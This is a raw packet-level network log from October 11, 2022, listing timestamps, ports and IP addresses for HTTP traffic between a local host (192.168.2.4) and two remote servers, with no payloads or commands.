Oct 11, 2022 15:04:22.604248047 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604249001 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.604285002 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.604320049 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.605895996 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.605928898 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.605953932 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.605977058 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.605998039 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606002092 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606025934 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606050014 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606069088 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606069088 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606074095 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606095076 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606100082 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606123924 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606125116 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606148958 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606148958 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606173038 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606177092 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606199026 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606224060 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606244087 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606246948 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606272936 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606273890 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606293917 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606311083 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606322050 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606322050 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606328011 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606340885 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.606404066 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606404066 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.606404066 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.613101006 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613132000 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613147974 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613162994 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613183975 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613209963 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613233089 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613256931 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613281012 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613303900 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613327980 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613353968 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613372087 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.613509893 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.613509893 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.613563061 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.633558989 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:22.660299063 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:22.660516977 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:22.660669088 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:22.690145969 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:22.861350060 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:22.861438036 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:22.868494987 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:22.895018101 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.082669020 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.082703114 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.082715988 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.082732916 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.082746983 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.082765102 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.082818985 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.082818985 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.083323002 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.083343983 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.083357096 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.083369970 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.083379984 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.083389997 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.083415985 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.083451986 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.088053942 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.088078022 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.088090897 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.088203907 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109144926 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109179020 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109196901 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109220028 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109242916 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109258890 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109303951 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109339952 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109354973 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109380007 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109397888 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109400034 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109447002 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109460115 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109483004 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109499931 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109505892 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109535933 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109603882 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109641075 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109653950 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109658003 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109708071 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109716892 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109766006 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109786034 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109802961 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109833002 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109910965 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109934092 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109951019 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.109955072 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.109977961 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.110001087 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.110039949 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.110043049 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.110060930 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.110084057 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.114406109 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.114434958 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.114451885 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.114468098 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.114475012 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.114496946 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.114497900 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.114511013 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.114514112 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.114533901 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.135855913 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.135889053 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.135907888 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.135931015 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.135952950 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.135962009 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.135970116 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.135996103 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.136018991 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.136147976 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.136173010 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.136189938 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.136224031 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.136286020 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.136310101 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.136327982 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.136328936 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.136353016 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.136562109 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.136586905 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.136614084 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.136630058 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.136754990 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.136965990 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.136990070 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137005091 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137015104 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137029886 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137130976 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137165070 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137176037 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137181997 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137214899 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137268066 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137291908 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137309074 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137310982 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137327909 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137387991 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137412071 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137428999 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137434959 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137454987 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137496948 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137520075 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137537003 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137537956 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137559891 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137702942 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137727022 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137743950 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.137748003 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137764931 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.137964010 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138000011 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138006926 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.138016939 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138045073 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.138211012 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138237000 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138252974 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138267040 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.138282061 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138283014 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.138329983 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.138345957 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138364077 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138386965 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.138676882 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138720989 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.138725996 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138744116 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.138767958 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.138978004 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.139000893 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.139018059 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.139034033 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.139060020 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.140572071 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.140602112 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.140619040 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.140621901 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.140646935 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.141000032 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.141026020 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.141043901 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.141063929 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.141083956 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.141087055 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.141099930 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.141103983 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.141129971 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.141185045 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.141210079 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.141227007 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.141237974 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.141252041 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.162400007 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162432909 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162451029 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162496090 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.162497044 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.162708044 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162734032 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162755966 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162774086 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162776947 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.162796974 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162802935 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.162802935 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.162821054 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162863970 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162889004 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.162918091 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.162950993 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.163115978 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163136959 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163152933 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163166046 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163197994 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.163223982 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.163299084 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163316965 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163333893 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163346052 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163357019 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.163377047 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.163604975 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163623095 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163639069 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163650990 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163691044 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.163718939 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.163786888 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163816929 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163834095 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163846970 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.163850069 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.163876057 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.163876057 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.164582014 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.164633036 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.164652109 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.164663076 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.164663076 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.164701939 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.164717913 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.164799929 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.164819002 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.164834976 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.164850950 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.164850950 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.164865017 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.164870977 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.164889097 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.164978981 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.164998055 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165014029 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165035963 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165052891 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165064096 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165076971 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165108919 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165507078 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165527105 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165543079 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165575981 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165612936 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165622950 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165637970 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165671110 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165724039 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165744066 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165761948 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165779114 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165781021 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165798903 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165827036 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165828943 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165847063 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165865898 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165879011 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165899992 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165910959 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165945053 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165951014 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.165962934 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165978909 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165992022 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.165992022 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.166011095 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.166202068 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166224957 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166240931 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166244030 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.166264057 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.166274071 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166296005 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.166315079 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166326046 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.166330099 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166363001 CEST	49703	80	192.168.2.4	194.76.225.61
